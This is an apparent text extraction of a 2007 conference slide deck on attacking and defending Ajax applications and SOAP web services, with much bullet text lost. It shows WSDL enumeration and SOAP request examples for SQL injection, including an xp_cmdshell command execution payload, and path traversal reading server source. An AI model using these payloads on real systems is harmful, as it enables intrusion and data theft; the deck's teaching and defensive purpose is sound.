SlideShare une entreprise Scribd logo
1  sur  116
Web 2.0 Hacking Defending Ajax & Web Services Shreeraj Shah Dubai, HITB 2007 5 th   April 2007
Who am I? ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],http://shreeraj.blogspot.com [email_address]
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Industry - Web 2.0
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Industry ,[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],Industry
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Web 2.0 Architecture HTML / JS / DOM RIA (Flash) Ajax Browser Internet Blog Web 2.0 Start  Database Authentication Application  Infrastructure Web Services End point Internet Mails News Documents Weather Bank/Trade RSS feeds
Ajax Flash / RIA HTML/CSS JavaScript Widget DOM SOAP XML-RPC HTTP/HTTPS JSON XML RSS/ATOM Text JS-Objects Custom SOA/WOA SaaS Web Services Ajax Traditional APIs REST Client Layer Protocol Layer Structure Layer Server Layer Web 2.0 Components
Technologies Web Server Static pages  HTML,HTM etc.. Web Client Scripted Web Engine Dynamic pages  ASP DHTML, PHP,CGI Etc.. DB X ASP.NET with  .Net  J2EE App Server Web Services Etc.. Application Servers And  Integrated Framework Internet DMZ Trusted  Internal/Corporate W E B S E R V I C E S Web Service Client SOAP, REST, XML-RPC
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Web 2.0 Security ,[object Object],[object Object],[object Object],[object Object],[object Object]
Web 2.0 Security ,[object Object],[object Object],[object Object],[object Object],[object Object]
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Impact of Web 2.0 ,[object Object],[object Object],[object Object],[object Object],[object Object]
Impact of Web 2.0 ,[object Object],Multiple sources (Urge for integrated information platform) Single place information (No urge for integration) (AI4) Information sharing Asynchronous & Cross-domains (proxy) Synchronous Postback Refresh and Redirect (AI3) Communication methods XML, JSON, JS Objects etc. HTML transfer  (AI2) Information structures SOAP, XML-RPC, REST etc. over HTTP & HTTPS HTTP & HTTPS (AI1) Protocols Web 2.0 Web 1.0 Changing dimension
Impact of Web 2.0 ,[object Object],Both server and client side exploitation Server side exploitation  (T4)  Exploitation ,[object Object],[object Object],Server side [Typical injections] (T3)  Vulnerabilities ,[object Object],[object Object],[object Object],Limited (T2)  Dependencies Scattered and multiple Structured (T1)  Entry points Web 2.0 Web 1.0 Changing dimension
Impact of Web 2.0 ,[object Object],Client-side analysis needed Focus on server-side only Code reviews Client-side with Ajax & Flash On the server-side [Difficult] Reverse engineering Difficult with Ajax and web services Easy after discovery Automated attacks Difficult with extensive Ajax Structured and simple Scanning Several streams Structured Enumeration Difficult with hidden calls Simple  Discovery Empowered with search Typical with "Host" and DNS Footprinting Web 2.0 Web 1.0 Changing dimension
Impact of Web 2.0 ,[object Object],Multiple places and scattered Structured and single place Secure coding Client side shift Only on server Logic shift Client side [incoming content] Server side Validations Complex DOM usage Simple DOM usage Browser security Multiple places [Mashups & RSS] Single place Owner of information Web 2.0 Web 1.0 Changing dimension
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Ajax basics ,[object Object],HTML / CSS JS / DOM XMLHttpRequest (XHR) Database / Resource XML / Middleware / Text Web Server Asynchronous  over HTTP(S)
Ajax - Sample ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Ajax attack points ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Ajax attack vectors ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Ajax fingerprinting ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Demo
Ajax enumeration ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Demo
Ajax Crawling ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Demo
Ajax Scanning ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Demo
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Ajax serialization issues ,[object Object],message = { from : "john@example.com", to : "jerry@victim.com", subject : "I am fine", body : "Long message here", showsubject : function(){document.write(this.subject)} }; XSS
Ajax serialization issues ,[object Object],[object Object],{"bookmarks":[{"Link":"www.example.com","Desc":"Interesting link"}]} new Array(“Laptop”, “Thinkpad”, “T60”, “Used”, “900$”, “It is great and I have used it for 2 years”)
Ajax and JS manipulation ,[object Object],[object Object],[object Object],[object Object],[object Object],Demo
Ajax and RSS injection ,[object Object],[object Object],[object Object],[object Object],Demo
Cross-domain calls ,[object Object],[object Object],[object Object],Demo
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Defending Ajax ,[object Object],[object Object],[object Object],[object Object],[object Object]
Defending Ajax ,[object Object],[object Object],[object Object],[object Object],[object Object]
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Transport Stack HTTP, HTTPS Access Stack WSDL,SOAP Discovery Stack UDDI, DISCO Security Stack WS-Security  Presentation Stack XML  Web services stack
Web Services Client HTTP POST SOAP Envelope Web Server 80/443 Web Services Engine Web Services Binaries Web Services Deployment Shell Web Services Code & Components User Controlled Vendor Controlled In Transit End Client Security!
Assessment strategies Web Services Risk Model Web Services Defense Controls Blackbox Assessment Whitebox Assessment
Risk - In transit  ,[object Object],[object Object],[object Object]
Risk - Web services Engine ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Web services Deployment - Risk ,[object Object],[object Object],[object Object],[object Object],[object Object]
Web services User code - Risk ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
wsches (Tool) Footprinting Discovery Public domain search Enumeration Manual Audit Auto Audit Defense wsFootprint wsDiscovery wsSearch wsEnum wsProxy wsAudit wsMod wsPawn wsKnight wsRook Download : http://net-square.com/wschess/
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Footprinting ,[object Object],[object Object],[object Object],[object Object],[object Object]
UDDI ,[object Object],[object Object],[object Object],[object Object],[object Object]
UDDI ,[object Object],[object Object],[object Object],[object Object],[object Object]
tModel Structure bindingTemplate Structure   businessService Structure businessEntity Structure Find UDDI APIs UDDI Demo
Web Service Discovery ,[object Object],[object Object],[object Object],[object Object],[object Object]
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Web Service Discovery ,[object Object],[object Object]
Web Service Search ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Demo
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Technology Identification ,[object Object],[object Object],[object Object],[object Object],[object Object]
Demo Application Web Services Location of WSDL
Technology Identification ,[object Object],[object Object],[object Object],.asmx – indicates  .Net server from MS
Technology Identification ,[object Object],[object Object],[object Object],C:gt;nc 192.168.11.2 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 28 Sep 2004 18:48:20 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 7565 Content-Type: text/html Set-Cookie: ASPSESSIONIDSSSRQDRC=LMMPKHNAAOFDHMIHAODOJHCO; path=/ Cache-control: private
Technology Identification ,[object Object],C:gt;nc 192.168.11.2 80 HEAD /ws/dvds4less.asmx HTTP/1.0 HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Tue, 28 Sep 2004 18:50:09 GMT X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 3026
WSDL Scanning/Enumeration ,[object Object],[object Object],[object Object]
WSDL ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Nodes of WSDL Data types Message Types Operations Access Binding Service
WSDL <Service> <service name=&quot;dvds4less&quot;> <port name=&quot;dvds4lessSoap&quot; binding=&quot;s0:dvds4lessSoap&quot;>   <soap:address location=&quot;http://192.168.11.2/ws/dvds4less.asmx&quot;/> </port> </service> Where the call is going to hit? It is where service is listening.
WSDL <portType> <portType name=&quot;dvds4lessSoap&quot;> <operation name=&quot;Intro&quot;> <input message=&quot;s0:IntroSoapIn&quot;/> <output message=&quot;s0:IntroSoapOut&quot;/> </operation> <operation name=&quot;getProductInfo&quot;> <input message=&quot;s0:getProductInfoSoapIn&quot;/> <output message=&quot;s0:getProductInfoSoapOut&quot;/> </operation> <operation name=&quot;getRebatesInfo&quot;> <input message=&quot;s0:getRebatesInfoSoapIn&quot;/> <output message=&quot;s0:getRebatesInfoSoapOut&quot;/> </operation> </portType> Methods one Can call
WSDL <Message> <portType name=&quot;dvds4lessSoap&quot;> <operation name=&quot;getProductInfo&quot;> <input message=&quot;s0:getProductInfoSoapIn&quot;/> <output message=&quot;s0:getProductInfoSoapOut&quot;/> </operation> </portType> <message name=&quot; getProductInfoSoapIn &quot;> <part name=&quot;parameters&quot; element=&quot;s0:getProductInfo&quot;/> </message> <message name=&quot; getProductInfoSoapOut &quot;> <part name=&quot;parameters&quot; element=&quot;s0:getProductInfoResponse&quot;/> </message>
WSDL <Types> <s:element name=&quot;getProductInfo&quot;> <s:complexType> <s:sequence> <s:element minOccurs=&quot;0&quot; maxOccurs=&quot;1&quot;  name=&quot;id&quot; type=&quot;s:string&quot; /> </s:sequence> </s:complexType> </s:element> <s:element name=&quot;getProductInfoResponse&quot;> <s:complexType> <s:sequence> <s:element minOccurs=&quot;0&quot; maxOccurs=&quot;1&quot;  name=&quot;getProductInfoResult&quot;  type=&quot;s:string&quot; /> <message name=&quot; getProductInfoSoapIn &quot;> <part name=&quot;parameters&quot; element=&quot;s0:getProductInfo&quot;/> </message> <message name=&quot; getProductInfoSoapOut &quot;> <part name=&quot;parameters&quot; element=&quot;s0:getProductInfoResponse&quot;/> </message>
WSDL Profile after Scan Demo String String getRebatesInfo String String getProductInfo String -No- Intro OUTPUT INPUT Methods
How it looks? Web Services Code OR Class Intro getProductInfo getRebatesInfo WSDL <PortType> <Service> <Message> <Types> Remote Invokes
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
AV 1 - XML poisoning ,[object Object],[object Object],[object Object],[object Object],[object Object]
XML poisoning ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
XML poisoning ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
XML poisoning ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
AV 2 - Parameter tampering & Fault code leakage   ,[object Object],[object Object],[object Object],Demo
SOAP request <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getRebatesInfo xmlns=&quot;http://tempuri.org/&quot;> <fileinfo>abx.xyz</fileinfo> </getRebatesInfo> </soap:Body> </soap:Envelope> SOAP Envelope Method  Call Input to the method Demo Forcing Fault Code Source of Enumeration
SOAP response <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>Server was unable to process request. --&gt; Could not find file &amp;quot; c:netpubwwrootebatesbx.xyz&amp;quot ;.</faultstring> <detail /> </soap:Fault> </soap:Body> </soap:Envelope> Path Enumeration Fault Code
AV 3 - SQL injection ,[object Object],[object Object],[object Object],[object Object],Demo
SOAP request <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getProductInfo xmlns=&quot;http://tempuri.org/&quot;> <id>1</id> </getProductInfo> </soap:Body> </soap:Envelope> SOAP Envelope Method  Call Input to the method
SOAP request <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getProductInfoResponse xmlns=&quot;http://tempuri.org/&quot;> <getProductInfoResult>/(1)Finding Nemo($14.99)/ </getProductInfoResult> </getProductInfoResponse> </soap:Body> </soap:Envelope> Product Information
SOAP response <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>Server was unable to process request. --&gt; Cannot use empty object or  column names . Use a single space if necessary.</faultstring> <detail /> </soap:Fault> </soap:Body> Demo Indicates SQL Server Place for SQL Injection Fault Code
SOAP response <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getProductInfo xmlns=&quot;http://tempuri.org/&quot;> <id>1 or 1=1</id> </getProductInfo> </soap:Body> </soap:Envelope> Popular SQL Injection Fault Code
SOAP request <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getProductInfoResponse xmlns=&quot;http://tempuri.org/&quot;> <getProductInfoResult> /(1)Finding Nemo($14.99)/ /(2)Bend it like Beckham($12.99)/ /(3)Doctor Zhivago($10.99)/ /(4)A Bug's Life($13.99)/ /(5)Lagaan($12.99)/ /(6)Monsoon Wedding($10.99)/ /(7)Lawrence of Arabia($14.99)/ </getProductInfoResult> </getProductInfoResponse> </soap:Body> Works!! Entire Table Is out
SOAP response <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getProductInfo xmlns=&quot;http://tempuri.org/&quot;> <id>1;EXEC master..xp_cmdshell 'dir c:> c:netpubwwrootsdir.txt'</id> </getProductInfo> </soap:Body> </soap:Envelope> Exploiting this Vulnerability Exploit code
SOAP request <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getProductInfoResponse xmlns=&quot;http://tempuri.org/&quot;> <getProductInfoResult>/(1)Finding Nemo($14.99)/ </getProductInfoResult> </getProductInfoResponse> </soap:Body> </soap:Envelope> Works!! Looks Normal response
SOAP request But … Code got executed  Looks Normal response Got Admin via cmdshell
AV 4 – XPATH injection  ,[object Object],[object Object],[object Object],[object Object]
XPATH Injection - Basics ,[object Object],[object Object],[object Object]
XPATH – Vulnerable Code ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Attacking XPATH point ,[object Object],[object Object],[object Object],[object Object],[object Object],Demo
AV 5 – LDAP injection ,[object Object],[object Object],[object Object],[object Object],[object Object],Demo
AV 6 – File System access ,[object Object],[object Object],[object Object],[object Object],Demo
SOAP request <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getRebatesInfo xmlns=&quot;http://tempuri.org/&quot;> <fileinfo>abx.xyz</fileinfo> </getRebatesInfo> </soap:Body> </soap:Envelope> SOAP Envelope Method  Call Input to the method Forcing Fault Code Source of Enumeration
SOAP response <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>Server was unable to process request. --&gt; Could not find file &amp;quot; c:netpubwwrootebatesbx.xyz&amp;quot ;.</faultstring> <detail /> </soap:Fault> </soap:Body> </soap:Envelope> Path Enumeration Fault Code
SOAP request <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getRebatesInfo xmlns=&quot;http://tempuri.org/&quot;> <fileinfo>../rebates.asp</fileinfo> </getRebatesInfo> </soap:Body> </soap:Envelope> SOAP Envelope Method  Call Input to the method Forcing file
SOAP request <?xml version=&quot;1.0&quot; encoding=&quot;utf-16&quot;?> <soap:Envelope xmlns:soap=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot;> <soap:Body> <getRebatesInfoResponse xmlns=&quot;http://tempuri.org/&quot;> <getRebatesInfoResult >&lt;%  '  file:  rebates.asp  '  date:  20-AUG-03  '  desc:  rebates listing  '  author:  nd  '  client:  dvds4less  'check if we have been called with a filename or without  loc = request.querystring(&quot;loc&quot;)  lenloc = len(loc)  if lenloc &gt; 0 then  ' we have been called with a filename  ' so print the rebate coupon%&gt;&lt;img  …………………… . </getRebatesInfoResult> </getRebatesInfoResponse> </soap:Body> </soap:Envelope> Parameter Temparing File Access to system
AV 7 – SOAP brute forcing  ,[object Object],[object Object],[object Object],[object Object]
AV 8 – Parameter overflow  ,[object Object],[object Object],[object Object],[object Object],[object Object]
AV 9 – Operating System access  ,[object Object],[object Object],[object Object],[object Object],[object Object]
AV 10 – Session hijacking  ,[object Object],[object Object],[object Object],[object Object],[object Object]
Other attacks ,[object Object],[object Object],[object Object]
Agenda ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Defense 1 SOAP filtering ,[object Object],[object Object],[object Object],[object Object],[object Object]
IIS Web Server HTTP Stack .Net Web Services IIS Web Server wsRook (Filter) Web Services Client SOAP Envelope Reject Rules for SOAP Content filtering
.Net Web Services .asmx file IIS web server wsRook Web Services Client SOAP Input Envelope <soap:Body soap:encodingStyle=&quot;http://schemas.xmlsoap.org/soap/encoding/&quot;> <q1:getInput xmlns:q1=&quot;http://DefaultNamespace&quot;> <id xsi:type=&quot;xsd:string&quot;>12123</id> </q1:getInput> </soap:Body> DB <id xsi:type=&quot;xsd:string&quot;>12123</id> id=12123 Bal=$2500 <ns1:getInputReturn xsi:type=&quot;xsd:string&quot;> $2500 </ns1:getInputReturn> SOAP Output Envelope Content filtering
Defense 2 WSDL hardening ,[object Object],[object Object],[object Object],[object Object],[object Object]
Defense 3 Authentication & Authorization ,[object Object],[object Object],[object Object],[object Object]
Defense 4 Secure Coding ,[object Object],[object Object],[object Object],[object Object]
Defense 5 XML parsing ,[object Object],[object Object],[object Object]
Thanks! Email - shreeraj@net-square.com Blog - http://shreeraj.blogspot.com

Contenu connexe

Tendances

Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
Rest API Security - A quick understanding of Rest API Security
Rest API Security - A quick understanding of Rest API SecurityRest API Security - A quick understanding of Rest API Security
Rest API Security - A quick understanding of Rest API SecurityMohammed Fazuluddin
 
Penetration testing
Penetration testingPenetration testing
Penetration testingAmmar WK
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scriptingkinish kumar
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017TriNimbus
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.Mikhail Egorov
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
Token Authentication in ASP.NET Core
Token Authentication in ASP.NET CoreToken Authentication in ASP.NET Core
Token Authentication in ASP.NET CoreStormpath
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksRaghav Bisht
 
Authentication vs authorization
Authentication vs authorizationAuthentication vs authorization
Authentication vs authorizationFrank Victory
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingInMobi Technology
 
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Daniel Tumser
 

Tendances (20)

Web application security
Web application securityWeb application security
Web application security
 
Rest API Security - A quick understanding of Rest API Security
Rest API Security - A quick understanding of Rest API SecurityRest API Security - A quick understanding of Rest API Security
Rest API Security - A quick understanding of Rest API Security
 
Http request smuggling
Http request smugglingHttp request smuggling
Http request smuggling
 
Penetration testing
Penetration testingPenetration testing
Penetration testing
 
XSS
XSSXSS
XSS
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017Web App Security Presentation by Ryan Holland - 05-31-2017
Web App Security Presentation by Ryan Holland - 05-31-2017
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs.
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with example
 
Xss ppt
Xss pptXss ppt
Xss ppt
 
Token Authentication in ASP.NET Core
Token Authentication in ASP.NET CoreToken Authentication in ASP.NET Core
Token Authentication in ASP.NET Core
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion Attacks
 
Authentication vs authorization
Authentication vs authorizationAuthentication vs authorization
Authentication vs authorization
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Execution
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site Scripting
 
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)
 

En vedette

Java Web Services [4/5]: Java API for XML Web Services
Java Web Services [4/5]: Java API for XML Web ServicesJava Web Services [4/5]: Java API for XML Web Services
Java Web Services [4/5]: Java API for XML Web ServicesIMC Institute
 
Restful Web Services
Restful Web ServicesRestful Web Services
Restful Web ServicesAngelin R
 
Web Services (SOAP, WSDL, UDDI)
Web Services (SOAP, WSDL, UDDI)Web Services (SOAP, WSDL, UDDI)
Web Services (SOAP, WSDL, UDDI)Peter R. Egli
 
